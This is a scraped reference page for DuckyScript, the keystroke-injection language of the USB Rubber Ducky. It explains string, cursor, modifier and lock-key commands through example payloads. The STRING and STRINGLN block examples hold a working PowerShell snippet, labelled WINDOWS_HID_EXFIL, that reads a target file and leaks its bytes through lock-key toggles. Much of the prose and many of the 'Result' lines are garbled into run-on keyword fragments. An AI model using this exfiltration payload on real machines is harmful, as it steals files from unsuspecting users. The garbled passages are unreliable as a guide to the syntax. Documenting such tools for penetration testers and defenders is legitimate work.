STRINGSTRINGSPACESTRING

Character Keys: Alphanumeric

Each new line containing a number will type the corresponding character.

The following alphanumeric keys are available:

0 1 2 3 4 5 6 7 8 9a b c d e f g h i j k l m n o p q r s t u v w x y zA B C D E F G H I J K L M N O P Q R S T U V W X Y Z

Example

REM Example Alphanumeric Keystroke Injection
ATTACKMODE HID STORAGE
DELAY 2000
STRING abc123XYZ

Result

abc123XYZ
SHIFT

Character Keys: Punctuation

Similar to the alphanumeric keys, each new line containing a punctuation key will type the corresponding character.

The following punctuation keys are available:

` ~ ! @ # $ % ^ & * ( ) - _ = + [ ] { } ; : ' " , . < > / ?

Example

REM Example Numeric and Punctuation Keystroke Injection
ATTACKMODE HID STORAGE
DELAY 2000
STRING 1+1=2

Result

1+1=2

STRING

STRINGSHIFTSPACE

Example using STRING

STRING
REM Example Keystroke Injection without STRING
ATTACKMODE HID STORAGE
DELAY 2000
STRING H
STRING ello, World!

Result

Hello, World!

Example without STRING

STRING

While you may see this used in older payloads it is no longer recommended to use.

REM Example Keystroke Injection without STRING
ATTACKMODE HID STORAGE
DELAY 2000
H
e
l
l
o
,
SPACE
W
o
r
l
d
!

STRINGLN

STRINGSTRING
STRINGSTRING cdSTRING lscdls

Example

STRING cd
STRING ls

Result

ENTERSTRING
STRING cd
ENTER
STRING ls
ENTER
STRINGLNENTER
STRINGLN

Example

STRINGLN cd
STRINGLN ls

Result

STRING & STRINGLN Blocks

STRING Blocks

STRINGSTRING
STRING

Simple STRING block example

STRING
    a
    b
    c
END_STRING

is the equivalent of 

STRING a
STRING b
STRING c
STRING abc

Result

Deploying this payload will produce the following keystroke injection on the target machine:

abc

STRING block usecase Example

STRINGWINDOWS_HID_EXFIL
STRING
STRING foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit;
STRING
    foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
        foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
            If($b -band $a){
                $o+="%{NUMLOCK}"
            }Else{
                $o+="%{CAPSLOCK}"
            }
        }
    };
    $o+="%{SCROLLLOCK}";
    Add-Type -Assembly System.Windows.Forms;
    [System.Windows.Forms.SendKeys]::SendWait("$o");
    exit;
END_STRING

Result

Deploying this payload will produce the following keystroke injection on the target machine:

foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit;
STRING

STRINGLN Blocks

Simple STRINGLN block example

STRINGLN
STRINGLN
STRINGLN
    a
    b
    c
END_STRINGLN

is the equivalent of

STRINGLN a
STRINGLN b
STRINGLN c

Result

Deploying this payload will produce the following keystroke injection on the target machine:

a
b
c

STRINGLN block usecase example

STRINGSTRINGLN
STRINGLN
    foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
        foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
            If($b -band $a){
                $o+="%{NUMLOCK}"
            }Else{
                $o+="%{CAPSLOCK}"
            }
        }
    };
    $o+="%{SCROLLLOCK}";
    Add-Type -Assembly System.Windows.Forms;
    [System.Windows.Forms.SendKeys]::SendWait("$o");
    exit;
END_STRING

Result

Deploying this payload will produce the following keystroke injection on the target machine:

foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
    foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
        If($b -band $a){
            $o+="%{NUMLOCK}"
        }Else{
            $o+="%{CAPSLOCK}"
        }
    }
};
$o+="%{SCROLLLOCK}";
Add-Type -Assembly System.Windows.Forms;
[System.Windows.Forms.SendKeys]::SendWait("$o");
exit;

Embedded Language Blocks

STRING_POWERSHELLSTRINGLN_POWERSHELLSTRING_BATCHSTRINGLN_BATCHSTRING_BASHSTRINGLN_BASHSTRING_JAVASCRIPTSTRINGLN_JAVASCRIPTSTRING_PYTHONSTRINGLN_PYTHONSTRING_RUBYSTRINGLN_RUBYSTRING_HTMLSTRINGLN_HTML
STRINGSTRINGLN

Example

This syntax will work with PayloadStudio Community edition; only syntax highlighting and auto-complete feature additions are limited to the Pro edition.

Cursor Keys

As opposed to character keys, which type a letter, number or punctuation, the cursor keys are used to navigate the cursor to a different position on the screen. 

UPDOWNLEFTRIGHTHOMEENDPAGEUPPAGEDOWNDELETEBACKSPACEINSERTTABSPACE

The following cursor keys are available:

UPARROW DOWNARROW LEFTARROW RIGHTARROWPAGEUP PAGEDOWN HOME ENDINSERT DELETE BACKSPACETABSPACE
UPDOWNLEFTRIGHTUPARROWDOWNARROWLEFTARROWRIGHTARROW

Example

REM Example Keystroke Injection without Cursor Keys
ATTACKMODE HID STORAGE
DELAY 2000
STRING 456
BACKSPACE
BACKSPACE
BACKSPACE
STRING 123
HOME
STRING abc
END
STRING UVW
LEFTARROW
LEFTARROW
LEFTARROW
DELETE
DELETE
DELETE
STRING XYZ

Result

456BACKSPACE456123HOMEabcENDUVWLEFTARROWDELETEUVWXYZabc123XYZ

System Keys

These keys are primarily used by the operating system for special functions and may be used to interact with both text areas and navigating the user interface.

The following system keys are available:

ENTERESCAPEPAUSEBREAKPRINTSCREENMENUAPPF1F2F3F4F5F6F7F8F9F0F11F12

Basic Modifier Keys

Up until now only character, control and system keys have been discussed. These generally type a character, move the cursor, or perform a special action depending on the program or operating system of the target.

SHIFTaA
ALTF4
CTRL cCTRL xCTRL vCOMMAND cCOMMAND xCOMMAND v

The following basic modifier keys are available:

SHIFTALTCONTROLCTRLCOMMANDWINDOWSGUI
CTRLGUICONTROLWINDOWS

Example: Windows

REM Example Modifier Key Combo Keystroke Injection for Windows
ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 2000
BACKSPACE
STRING 123
DELAY 2000
CTRL a
CTRL c
CTRL v
CTRL v
DELAY 2000
ALT F4

Result

GUI rBACKSPACE123CTRL a123123ALT F4

Example: macOS

REM Example Modifier Key Combo Keystroke Injection for macOS
ATTACKMODE HID STORAGE VID_05AC PID_021E
DELAY 2000
COMMAND SPACE
DELAY 2000
STRING 123
DELAY 2000
COMMAND a
COMMAND c
COMMAND v
COMMAND v
DELAY 2000
ESCAPE
ESCAPE

Result

VIDPIDATTACKMODECOMMAND SPACE123123123ESCAPE

Key and Modifier Combos

SPACE-
CTRL-ALTCTRL-SHIFTALT-SHIFTCOMMAND-CTRLCOMMAND-CTRL-SHIFTCOMMAND-OPTIONCOMMAND-OPTION-SHIFT

Example

ATTACKMODE HID STORAGE
DELAY 2000
CTRL ALT DELETE

Result

  • The USB Rubber Ducky will be recognized by the target as a keyboard and mass storage.

  • After a 2 second pause, the infamous "three finger salute" key combination will be pressed. This may be necessary for login on many Windows systems.

Standalone Modifier Keys

SHIFT
WINDOWSGUIWINDOWSENTERGUIUPENTERGUI r
WINDOWSGUI

Similar functionality can now be found on ChromeOS and many Linux window managers.

To press a standalone modifier key in DuckyScript, it must be prefixed with the INJECT_MOD command.

Example

REM Example Standalone Modifier Key Keystroke Injection for Windows
ATTACKMODE HID STORAGE
DELAY 2000
INJECT_MOD WINDOWS
DELAY 2000
STRING calc
DELAY 2000
ENTER

Result

WINDOWSGUIINJECT_MODcalcENTER

Lock Keys

These keys specify a distinct mode of operation and are significant due to the bi-directional nature of the lock state. This nuance will come in handy for more advanced payloads — but for now suffice it to say that the three standard lock keys can be pressed just like any ordinary key.

The following lock keys are available:

CAPSLOCKNUMLOCKSCROLLLOCK

Example

ATTACKMODE HID STORAGE
DELAY 2000
CAPSLOCK
STRING abc123XYZ

Result

CAPSLOCKABC123xyzSTRINGSHIFT
CAPSLOCK
CAPSLOCK